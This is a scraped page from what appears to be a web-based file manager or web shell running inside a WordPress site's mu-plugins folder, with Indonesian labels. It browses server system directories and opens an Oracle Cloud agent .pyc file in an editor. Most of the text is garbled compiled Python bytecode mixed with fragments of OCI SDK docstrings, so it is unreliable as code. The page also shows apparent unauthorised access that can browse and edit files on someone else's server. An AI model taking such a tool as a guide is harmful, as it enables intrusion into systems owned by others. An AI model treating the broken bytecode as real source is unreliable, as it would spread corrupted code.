📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
sch
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/sch/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: log_rule_task_details.pyc
a O��f � @ sD d dl mZ ddlmZmZmZ ddlmZ eG dd� de��ZdS )� )�TaskDetails� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ sJ e Zd ZdZdd� Zedd� �Zejdd� �Zdd� Zd d � Z dd� Z d S )�LogRuleTaskDetailsz� The log rule task. For configuration instructions, see `To create a service connector`__. __ https://docs.cloud.oracle.com/iaas/Content/service-connector-hub/managingconnectors.htm#create c K s. ddd�| _ ddd�| _d| _d| _d| _dS )a� Initializes a new LogRuleTaskDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.sch.models.LogRuleTaskDetails.kind` attribute of this class is ``logRule`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param kind: The value to assign to the kind property of this LogRuleTaskDetails. Allowed values for this property are: "function", "logRule" :type kind: str :param condition: The value to assign to the condition property of this LogRuleTaskDetails. :type condition: str �str)�kind� conditionr r N�logRule)� swagger_types� attribute_map�_kind� _condition)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/sch/models/log_rule_task_details.py�__init__ s ��zLogRuleTaskDetails.__init__c C s | j S )a **[Required]** Gets the condition of this LogRuleTaskDetails. A filter or mask to limit the source used in the flow defined by the service connector. :return: The condition of this LogRuleTaskDetails. :rtype: str �r �r r r r r 2 s zLogRuleTaskDetails.conditionc C s || _ dS )z� Sets the condition of this LogRuleTaskDetails. A filter or mask to limit the source used in the flow defined by the service connector. :param condition: The condition of this LogRuleTaskDetails. :type: str Nr )r r r r r r >